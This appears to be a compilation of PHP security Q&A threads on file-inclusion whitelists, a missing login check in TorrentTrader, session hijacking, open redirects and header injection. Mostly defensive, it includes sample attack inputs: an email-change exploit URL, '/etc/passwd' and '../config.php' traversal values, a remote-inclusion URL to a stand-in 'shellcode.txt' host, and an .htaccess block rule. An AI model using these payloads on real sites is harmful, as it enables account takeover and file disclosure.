I'm learning php on my own now and I'm developing some simple sites using php include to ease the page creation process.
I've searched this website for ways to make it secure but, as a noob, I'm always afraid of messing up.
<?php
$siteArticles = array('instalacoes', 'galeria', 'regiao-e-historia', 'precos', 'contactos');
if (isset($_GET['page'])) {
    if (in_array($_GET['page'], $siteArticles, true) && file_exists('pt/rbs-article-' . $_GET['page'] . '.php')) {
        include('pt/rbs-article-' . $_GET['page'] . '.php');
    }
} else {
    include('pt/rbs-article-home.php');
}
?>
As you can see, it first checks whether the requested page is allowed via the whitelist array and then adds a prefix to the file name.
My question is, how secure is this?
Thank you for your time.
It is secure. The in_array() check is what makes it secure. It is not possible to perform a Local File Inclusion (LFI) attack on this code simply because the requested page must exactly match one of the elements in the whitelist array.
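One detail worth spelling out is the third argument to in_array(). With loose comparison (no third argument), PHP 7 and earlier treat a non-numeric string as equal to the integer 0, so a whitelist that ever contains integers could be bypassed. A small illustration (the array and the path string are made up):
<?php
// Illustration only: why the strict flag matters.
$badWhitelist = array(0, 1); // a whitelist that (accidentally) holds integers

var_dump(in_array('../../etc/passwd', $badWhitelist));       // true on PHP 7.x and earlier (loose ==), false on PHP 8
var_dump(in_array('../../etc/passwd', $badWhitelist, true)); // false everywhere (strict ===)
?>
With an all-string whitelist like $siteArticles the strict flag is not strictly required, but it costs nothing and removes that whole class of type-juggling surprises.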
Related
So I have a PHP script that I myself have not designed but has a known security flaw. There's an admin panel where the admin can change various profile settings for every user, including their email address. The security flaw is such that anyone who knows the correct URL can change the email address of any registered user, including the admin, so long as they know the corresponding user's ID, by simply calculating the MD5 hash of the new email address they want to change to and issuing a GET request, without ever having to login as an admin. For example, entering the following URL into your browser:
admin.php?userid=1&md5hash=c59152a77c0bc073fe6f2a3141b99010&email=blah#blah.com
Would successfully update the email address of user with ID of "1" to blah#blah.com.
Now, from what research I've done so far, it appears that ditching MD5 hashes for a slightly more proprietary/secure form of encryption would be the best/most secure way of going about this. But while I feel I have a fairly good understanding of PHP and have written a few basic scripts myself, since I haven't designed the particular script in question I'm not sure if this would actually be possible and/or plausible. Also, people do still use MD5 hashes in practice, so there must exist another equally feasible way to protect against such exploits, which led me to looking into Apache's mod_rewrite module to block specific types of GET requests:
[redacted for irrelevance because of max link limit of 2 for new users]
So my questions would be:
1) Disregarding whether or not it would actually be feasible, would changing the PHP script to using some other form of encryption besides MD5 hashes be the BEST possible way to go about this? Or is there some simple function that I can add to the PHP script itself to protect from this kind of exploit?
2) If I went the route of using Apache's mod_rewrite as described in the above URL, what would be the best method (out of THE_REQUEST, HTTP_REFERER, HTTP_COOKIE, REQUEST_URI, HTTP_USER_AGENT, QUERY_STRING, and/or REMOTE_ADDR, where REQUEST_METHOD is "GET")? Or is it even possible to do what I'm trying to do this way?
3) Someone had also suggested it may be possible to do what I am trying to do via a .htaccess file? Is this possible, and would this method be any more or less secure than the other two mentioned?
The only thing to take into consideration is that, whichever method I end up using, the server obviously still has to be able to issue the request when the admin wants to legitimately change a user's email address. I just need to update it so that the general public cannot change a user's email address simply by typing the correct URL into their browser, given they know the correct user ID. Thanks in advance.
EDIT: Sorry, I neglected to name the particular script because it is a publicly available one and I wasn't sure if this particular exploit was a known one, but it turns out it is, so I guess there's no harm in posting it here. The script is TorrentTrader (v2.08); you can download the entire script at SourceForge (https://sourceforge.net/projects/torrenttrader/).
I've also copied and pasted the entirety of account-ce.php:
<?php
//
// TorrentTrader v2.x
// $LastChangedDate: 2012-09-28 20:35:06 +0100 (Fri, 28 Sep 2012) $
// $LastChangedBy: torrenttrader $
//
// http://www.torrenttrader.org
//
require_once("backend/functions.php");
dbconn();
$id = (int) $_GET["id"];
$md5 = $_GET["secret"];
$email = $_GET["email"];
if (!$id || !$md5 || !$email)
show_error_msg(T_("ERROR"), T_("MISSING_FORM_DATA"), 1);
$res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `editsecret` != '' AND `id` = '$id'");
$row = mysql_fetch_assoc($res);
if (!$row)
show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
$sec = $row["editsecret"];
if ($md5 != md5($sec . $email . $sec))
show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"]));
header("Refresh: 0; url=account.php");
header("Location: account.php");
?>
account-ce.php is the PHP file referenced in the following list of several known exploits (the first exploit is the only one I'm looking at right now):
https://www.exploit-db.com/exploits/21396/
I figured rather than sit around and wait for TorrentTrader to release a new update I would try and be proactive and fix some of the exploits myself.
You need to include a session handler. I would like to assume that a user is required to log in before being allowed to access any admin page, and that some sort of login credential or user id is saved to a session variable. To implement that you would need to have a script like this included on every page:
<?php
session_start();
if (!isset($_SESSION['uid'])) {
    $redirect_url = 'login.php';
    if (isset($_SERVER['HTTP_REFERER'])) {
        $redirect_url .= '?target=' . urlencode($_SERVER['HTTP_REFERER']);
    }
    header('Location: ' . $redirect_url);
    exit(); // stop here so the protected page below never executes
}
?>
$_SESSION['uid'] is somewhat arbitrary and could be any session variable you deem sufficient for the security of your application. Note: session variables are connected to the user and are saved from page to page until the session is destroyed by calling session_destroy().
If the above script is executed prior to every page load, then when some evil hacker tries to trigger the script without being logged in, they will be redirected to login.php before the rest of the script/page is executed/loaded.
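For context, the login script is the place that would set $_SESSION['uid'] in the first place. A very rough sketch of that side; the find_user_by_name() helper, the column names, and the password_verify() usage are assumptions for illustration, not code from TorrentTrader:
<?php
session_start();

if (isset($_POST['username'], $_POST['password'])) {
    // find_user_by_name() is a hypothetical lookup; replace it with however
    // your application fetches the user row.
    $user = find_user_by_name($_POST['username']);

    if ($user && password_verify($_POST['password'], $user['password_hash'])) {
        session_regenerate_id(true);      // guard against session fixation
        $_SESSION['uid'] = $user['id'];   // this is what the guard script checks
        header('Location: account.php');
        exit();
    }
}

header('Location: login.php?error=1');
exit();
?>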
The current script is very insecure, but the insecurity does not arise from the use of the MD5 hash. It would be really difficult to bolt security on top of a system like this using just Apache configuration.
You might want to start by reading up on session security and cross site request forgery.
You need to write some code. And since you've not posted any code nor proposed a specific solution, your question is rather off topic here.
Alright guys, I feel moderately stupid now, but thank you for the tips on using the session handler, as that is what ultimately pointed me in the right direction and got me looking in the right place. After digging around, it seems as though that particular admin file (account-ce.php), for whatever reason, was just missing this:
loggedinonly();
which is defined in backend/functions.php as:
function loggedinonly() {
    global $CURUSER;
    if (!$CURUSER) {
        header("Refresh: 0; url=account-login.php?returnto=" . urlencode($_SERVER["REQUEST_URI"]));
        exit();
    }
}
Also, I plan to read up on session security as you suggested so I can better familiarize myself with how sessions are used for this purpose. Thanks again! :)
I'm using these docs to integrate a certain level of protection against session hijacking (bottom of page).
While I can understand the basics of what the article explains, I'm still new to all this and I'm just not able to pin-point what I should do.
I get how this would work:
<?php
session_start();
if (isset($_SESSION['HTTP_USER_AGENT']))
{
    if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT']))
    {
        /* Prompt for password */
        exit;
    }
}
else
{
    $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
}
?>
... and I kinda understand how this can make the above more secure:
<?php
$string = $_SERVER['HTTP_USER_AGENT'];
$string .= 'SHIFLETT';
/* Add any other data that is consistent */
$fingerprint = md5($string);
?>
However, I'm stuck at combining the two into one working script. The docs state:
we should pass this fingerprint as a URL variable.
What does that mean? Do I need to pass the fingerprint in the URL and then use $_GET on each page? Can anyone help me combine these two snippets of code into one file that I can include in all my PHP files?
Yes, you'd need to add this token to any URLs and then check it on every page.
Basically, what you're trying to accomplish is what cryptographers call a nonce (number used once). The idea is to generate the nonce from the request parameters and then validate that the parameters haven't been tampered with.
Ideally this should be a hash salted with something random and used only once. There are many libraries that will take care of it for you.
Remember that hashes are not symmetric, i.e. you can't un-hash request variables to check that they're the same thing. What you can do is take a hash of the parameters and compare the hashes. It's important to remember the salt, because without it you'd be susceptible to rainbow tables.
Also, if you use $_REQUEST rather than $_GET you can reuse the same logic for both $_POST and $_GET.
You can take a look at this library for example: http://fullthrottledevelopment.com/php-nonce-library
You can also borrow the nonce-generating code from WordPress.
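One rough way to stitch the two snippets from the question together along those lines; the salt value, the 'token' parameter name, and the helper function are assumptions, and this ties the token to the session rather than being a strict single-use nonce:
<?php
// Carry a salted fingerprint token in every URL and check it on every page.
define('SECRET_SALT', 'a long random string, e.g. SHIFLETT');

session_start();

// Fingerprint of data that should stay constant for this visitor.
function fingerprint() {
    return md5(SECRET_SALT . $_SERVER['HTTP_USER_AGENT'] . session_id());
}

// When building links, append the token:
$link = 'somepage.php?token=' . fingerprint();

// At the top of every page, verify it (works for GET and POST via $_REQUEST):
if (!isset($_REQUEST['token']) || $_REQUEST['token'] !== fingerprint()) {
    /* Prompt for password, or simply bail out */
    exit;
}
?>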
I've been working on a project on my local server. The time has come to upload it so I did just that. I started to test it out online and my navigation isn't working.
The navigation works through plain links that pass a page name in the query string, along the lines of:
<a href="index.php?p=add">Add</a>
The page then checks whether $p exists and if it does, it shows the relevant content. For some reason though my content isn't showing up when I click the links. I turned on error reporting, and I added this (line 39)
echo $p;
to the document. Now I get this error: Notice: Undefined variable: p in /home/silver/public_html/admin/index.php on line 39, but only when testing online; it works fine when I test it locally.
I can post my code if I need to, but there's a lot of it and I'm not sure which bit is the problem.
UPDATE:
Thanks for all the replies, but I'm confused as to how to use your suggestions, as I'm used to doing things the way I was.
At the moment, I do this to check what the $p variable is:
<?php if(!isset($p)) { // DEFAULT PAGE VIEWED AT INDEX.PHP ?>
And I link to the page with something like:
<a href="index.php?p=add">Add New Item</a>
You're relying upon register_globals, an outdated and deprecated feature of PHP. This feature automatically translates GET, POST, COOKIE, SERVER etc. variables and inserts them into the global scope. This means that file.php?p=blah would result in $p == 'blah'. This is a bad idea for lots of different scoping and security reasons outlined in the PHP manual.
Use the superglobals (e.g. $_GET, $_POST, $_SERVER) instead.
In response to your updated question, your code
<?php if(!isset($p)) { // DEFAULT PAGE VIEWED AT INDEX.PHP ?>
should become
<?php if(!isset($_GET['p'])) { // DEFAULT PAGE VIEWED AT INDEX.PHP ?>
You're relying on an old and very bad "feature" of PHP called register_globals that loads variables directly from GET. You need to do $p = $_GET['p'] if you want $p to be set via an HTTP GET.
Probably because register_globals is ON on your dev system and OFF on your live system. Set it to OFF on your dev system too, and use $_GET['p'].
$p doesn't automatically get set from the parameter in the URL. You need to attach $p to the value coming from the URL by using the code $p = $_GET['p']; first.
Be wary though: you need to sanitize this GET parameter and/or check it against a whitelist to make sure it is a valid value.
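A rough sketch of what that whitelist could look like; the page names and the pages/ directory are made up for illustration:
<?php
// Hypothetical whitelist for the ?p= navigation parameter.
$allowed = array('add', 'edit', 'list');

$p = isset($_GET['p']) ? $_GET['p'] : '';

if (in_array($p, $allowed, true)) {
    include dirname(__FILE__) . '/pages/' . $p . '.php';
} else {
    // DEFAULT PAGE VIEWED AT INDEX.PHP
    include dirname(__FILE__) . '/pages/default.php';
}
?>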
I am really new to online web application. I am using php, I got this code:
if(isset($_GET['return']) && !empty($_GET['return'])){
    return = $_GET['return'];
    header("Location: ./index.php?" . $return);
} else {
    header("Location: ./index.php");
}
The $return variable is a URL variable which can easily be changed by a hacker.
E.g. I get the $return variable from this: www.web.com/verify.php?return=profile.php
Is there anything I should take care of? Should I use htmlentities in this line:
header("Location: ./index.php?" . htmlentities($return));
Is it vulnerable to attack by a hacker?
What should I do to prevent hacking?
Apart from that typo on line 2 (it should be $return = $_GET['return'];), you should do $return = urlencode($return) to make sure that $return is a valid query string as it's passed as a parameter to index.php.
index.php should then verify that return is a valid URL that the user has access to. I do not know how your index.php works, but if it simply displays a page then you could end up with something like index.php?/etc/passwd or similar, which could indeed be a security problem.
Edit: What security hole do you get? There are two possible problems that I could see, depending how index.php uses the return value:
If index.php redirects the user to the target page, then I could use your site as a relay to redirect the user to a site I control. This could be either used for phishing (I make a site that looks exactly like yours and asks the user for username/password) or simply for advertising.
For example, http://yoursite/index.php?return=http%3A%2F%2Fwww.example.com looks like the user is accessing YourSite, but they then get redirected to www.example.com. As I can encode any character using the %xx notation, this may not even be obvious to the user.
If index.php displays the file from the return parameter, I could try to pass in the name of some system file like /etc/passwd and get a list of all users. Or I could pass something like ../config.php and get your database connection details.
I don't think that's the case here, but this is such a common security hole I'd still like to point it out.
As said, you want to make sure that the URL passed in through the querystring is valid. Some ways to do that could be:
$newurl = "http://yoursite/" . $return;
this could ensure that you are always only on your domain and never redirect to any other domain
$valid = file_exists($return)
This works if $return is always a page that exists on the hard drive. By checking that return indeed points to a valid file you can filter out bogus entries
If return would accept querystrings (i.e. return=profile.php?step=2) then you would need to parse out the "profile.php" path
Have a list of valid values for $return and compare against it
this is usually impractical, unless you really designed your application so that index.php can only return a given set of pages
There are many ways to skin this cat, but generally you want to somehow validate that $return points to a valid target. What those valid targets are depends on your specification.
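As one deliberately conservative sketch of such validation, assuming the only valid targets are a small set of local pages (the list below is made up):
<?php
// Only pass through targets we explicitly know about; anything else falls
// back to a plain index.php redirect.
$allowedTargets = array('profile.php', 'settings.php');

$return = isset($_GET['return']) ? $_GET['return'] : '';

if (in_array($return, $allowedTargets, true)) {
    header('Location: ./index.php?' . urlencode($return));
} else {
    header('Location: ./index.php');
}
exit;
?>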
If you're running an older version of PHP 4 or 5, then I think you will be vulnerable to header injection: someone can set return to a URL, followed by a line return, followed by any other headers they want to make your server send.
You could avoid this by sanitising the string first. It might be enough to strip line returns but it would be better to have an allowed list of characters - this might be impractical.
4.4.2 and 5.1.2: This function now prevents more than one header to be sent at once as a protection against header injection attacks.
http://php.net/manual/en/function.header.php
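If you are stuck on one of those older versions, a simple sketch of the line-return stripping idea (the parameter name matches the question; everything else is illustrative):
<?php
// Remove CR/LF (raw and percent-encoded, just in case) so the value cannot
// smuggle additional headers into the response.
$return = isset($_GET['return']) ? $_GET['return'] : '';
$return = str_replace(array("\r", "\n", '%0d', '%0a', '%0D', '%0A'), '', $return);

header('Location: ./index.php?' . $return);
exit;
?>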
What would happen if you put in a page that didn't exist? For example:
return=blowup.php
or
return=http://www.google.co.uk
or
return=http%3A%2F%2Fwww.google.co.uk%2F
You could obfuscate the reference by not including the .php in the variable. You could then append it in the code, check for the existence of the file in your directory, or use a switch statement of allowable values, before redirecting to it.
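A quick sketch of that approach: keep ".php" out of the URL, append it in code, and only redirect when the resulting file actually exists (the directory layout and the regex are assumptions):
<?php
// Only allow simple page names, append the extension ourselves, and confirm
// the target exists next to this script before redirecting.
$page = isset($_GET['return']) ? basename($_GET['return']) : 'index';

if (preg_match('/^[a-z0-9_-]+$/i', $page) && file_exists(__DIR__ . '/' . $page . '.php')) {
    header('Location: ./' . $page . '.php');
} else {
    header('Location: ./index.php');
}
exit;
?>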
In this case, it depends more on what's done with that part of the query string in index.php. If it's being sent to a database query, output, eval(), or exec(), then yes, it's a very common security hole. Most other situations will be safe unfiltered, but it's best to write your own general-purpose sanitizing function which converts quotes of all varieties to their HTML entities, as well as equals signs.
The things I would do are:
Define what types of return values are allowed.
Write down all the possible return values.
Then draw conclusions: which characters are not allowed, what the maximum URL length is, which domains are allowed, etc.
Finally, make a filter function according to the above conclusions.
One thing a hacker can do: since you redirect to whatever $_GET['return'] contains, they can use it for XSS-style tricks or to redirect visitors to malware or anything like that. Beyond that, there isn't much else they can do with it.
My website was recently attacked by, what seemed to me as, an innocent code:
<?php
if ( isset( $_GET['page'] ) ) {
    include( $_GET['page'] . ".php" );
} else {
    include("home.php");
}
?>
There were no SQL calls, so I wasn't afraid of SQL injection. But, apparently, SQL isn't the only kind of injection.
This website has an explanation and a few examples of avoiding code injection: http://www.theserverpages.com/articles/webmasters/php/security/Code_Injection_Vulnerabilities_Explained.html
How would you protect this code from code injection?
Use a whitelist and make sure the page is in the whitelist:
$whitelist = array('home', 'page');
if (in_array($_GET['page'], $whitelist)) {
    include($_GET['page'] . '.php');
} else {
    include('home.php');
}
Another way to sanitize the input is to make sure that only allowed characters (no "/", ".", ":", ...) are in it. However, don't use a blacklist of bad characters, but a whitelist of allowed characters:
$page = preg_replace('/[^a-zA-Z0-9]/', '', $page);
... followed by a file_exists() check.
That way you can make sure that only scripts you want to be executed are executed (for example this would rule out a "blabla.inc.php", because "." is not allowed).
Note: This is kind of a "hack", because then the user could request "h.o.m.e" and it would give the "home" page, since all it does is remove the prohibited characters. It's not intended to stop "smartasses" who want to do cute stuff with your page, but it will stop people doing really bad things.
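Putting the character whitelist and the file_exists() check together might look roughly like this (the fallback to home.php is an assumption):
<?php
// Strip everything except letters and digits, then only include the file if
// it actually exists next to this script.
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
$page = preg_replace('/[^a-zA-Z0-9]/', '', $page);

$file = dirname(__FILE__) . '/' . $page . '.php';
if ($page !== '' && file_exists($file)) {
    include $file;
} else {
    include dirname(__FILE__) . '/home.php';
}
?>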
BTW: Another thing you could do in your .htaccess file is to prevent obvious attack attempts:
RewriteEngine on
RewriteCond %{QUERY_STRING} http[:%] [NC]
RewriteRule .* /-http- [F,NC]
RewriteRule http: /-http- [F,NC]
That way, all page accesses with "http:" in the URL (and query string) result in a "Forbidden" error message, without even reaching the PHP script. That results in less server load.
However, keep in mind that no "http" is then allowed anywhere in the query string. Your website MIGHT require it in some cases (maybe when filling out a form).
BTW: If you can read German, I also have a blog post on that topic.
The #1 rule when accepting user input is to always sanitize it. Here, you're not sanitizing your page GET variable before passing it to include. You should perform a basic check to see whether the file exists on your server before you include it.
Pek, there are many things to worry about in addition to SQL injection, and even other types of code injection. Now might be a good time to look a little further into web application security in general.
From a previous question on moving from desktop to web development, I wrote:
The OWASP Guide to Building Secure Web Applications and Web Services should be compulsory reading for any web developer that wishes to take security seriously (which should be all web developers). There are many principles to follow that help with the mindset required when thinking about security.
If reading a big fat document is not for you, then have a look at the video of the seminar Mike Andrews gave at Google a couple years back about How To Break Web Software.
I'm assuming you deal with files in the same directory:
<?php
if (isset($_GET['page']) && !empty($_GET['page'])) {
    $page = urldecode($_GET['page']);
    $page = basename($page);
    $file = dirname(__FILE__) . "/{$page}.php";

    if (!file_exists($file)) {
        $file = dirname(__FILE__) . '/home.php';
    }
} else {
    $file = dirname(__FILE__) . '/home.php';
}

include $file;
?>
This is not too pretty, but should fix your issue.
pek, for a short-term fix, apply one of the solutions suggested by other users. For a mid- to long-term plan you should consider migrating to one of the existing web frameworks. They handle all the low-level stuff like routing and file inclusion in a reliable, secure way, so you can focus on core functionality.
Do not reinvent the wheel. Use a framework. Any of them is better than none. The initial time investment in learning it pays back almost instantly.
Some good answers so far; it's also worth pointing out a couple of PHP specifics:
The file open functions use wrappers to support different protocols. This includes the ability to open files over a local Windows network, HTTP and FTP, amongst others. Thus, in a default configuration, the code in the original question can easily be used to open any arbitrary file on the internet and beyond; including, of course, all files on the server's local disks (that the webserver user may read). /etc/passwd is always a fun one.
Safe mode and open_basedir can be used to restrict access to files outside of a specific directory.
Also useful is the config setting allow_url_fopen, which can disable URL access to files when using the file open functions. Note that this setting can normally only be changed in php.ini or the server configuration, not via ini_set() at runtime.
These are all nice fall-back safety guards, but please use a whitelist for file inclusion.
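As a belt-and-braces sketch of such a fall-back guard (the pages/ directory name is an assumption): resolving the final path and checking that it stays inside one directory catches both ../ traversal and URL wrappers, since realpath() returns false for anything that is not an existing local file.
<?php
// Defence in depth: even with a whitelist, resolve the candidate path and
// refuse anything that does not end up inside the pages directory.
// Assumes the pages/ directory exists next to this script.
$pagesDir = realpath(dirname(__FILE__) . '/pages');
$page     = isset($_GET['page']) ? $_GET['page'] : 'home';

$candidate = realpath($pagesDir . '/' . $page . '.php');

if ($candidate !== false && strpos($candidate, $pagesDir . DIRECTORY_SEPARATOR) === 0) {
    include $candidate;
} else {
    include $pagesDir . '/home.php';
}
?>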
I know this is a very old post and I expect you don't need an answer anymore, but I still miss a very important aspect, IMHO, and I'd like to share it for other people reading this post. In your code, including a file based on the value of a variable makes a direct link between the value of a field and the requested result (page becomes page.php). I think it is better to avoid that.
There is a difference between the request for some page and the delivery of that page. If you make this distinction you can make use of nice URLs, which are very user- and SEO-friendly. Instead of a field value like 'page' you could make a URL like 'Spinoza-Ethica'. That is a key in a whitelist or a primary key in a table in a database, and it will return a hardcoded filename or value. That method has several advantages besides a normal whitelist:
the back end response is effectively independent from the front end request. If you want to set up your back end system differently, you do not have to change anything on the front end.
Always make sure you end up with hardcoded filenames or an equivalent from the database (preferably a return value from a stored procedure), because it is asking for trouble to use information from the request to build the response.
Because your URLs are independent of the delivery from the back end, you will never have to rewrite your URLs in the .htaccess file for this kind of change.
The URLs represented to the user are user friendly, informing the user about the content of the document.
Nice URLs are very good for SEO, because search engines are in search of relevant content, and when your URL is in line with the content it will get a better rating. At least a better rating than when your URL is definitely not in line with your content.
If you do not link directly to a php file, you can translate the nice URL into any other type of request before processing it. That gives the programmer much more flexibility.
You will have to sanitize the request, because you get the information from a standard untrusted source (the rest of the Web). Using only nice URLs as possible input makes the sanitization process of the URL much simpler, because you can check whether the returned URL conforms to your own format. Make sure the format of the nice URL does not contain characters that are used extensively in exploits (like ', ", <, >, -, &, ;, etc.).
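A small sketch of that request-key-to-hardcoded-filename idea; the slugs and filenames below are invented for illustration:
<?php
// Map nice URL keys to hardcoded filenames; the request never touches the
// filesystem path directly.
$pages = array(
    'Spinoza-Ethica' => 'articles/spinoza-ethica.php',
    'contact'        => 'contact.php',
);

$slug = isset($_GET['page']) ? $_GET['page'] : '';

// Accept only the expected slug format, then look it up in the map.
if (preg_match('/^[A-Za-z0-9-]+$/', $slug) && isset($pages[$slug])) {
    include dirname(__FILE__) . '/' . $pages[$slug];
} else {
    include dirname(__FILE__) . '/home.php';
}
?>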
#pek - That won't work, as your array keys are 0 and 1, not 'home' and 'page'.
This code should do the trick, I believe:
<?php
$whitelist = array(
    'home',
    'page',
);

if (in_array($_GET['page'], $whitelist)) {
    include($_GET['page'] . '.php');
} else {
    include('home.php');
}
?>
As you've a whitelist, there shouldn't be a need for file_exists() either.
Think of a URL in this format:
www.yourwebsite.com/index.php?page=http://malicodes.com/shellcode.txt
If shellcode.txt contains SQL or PHP injection code, then your website will be at risk, right? Do think about this; using a whitelist would help.
There is also a way to filter all variables to help prevent such attacks. You can use PHP IDS or the OSE Security Suite for that. After installing the security suite, you need to activate it; here is the guide:
http://www.opensource-excellence.com/shop/ose-security-suite/item/414.html
I would suggest you turn on layer 2 protection; then all POST and GET variables will be filtered, especially the ones I mentioned, and if any attacks are detected it will report to you immediately.
Safety is always the priority.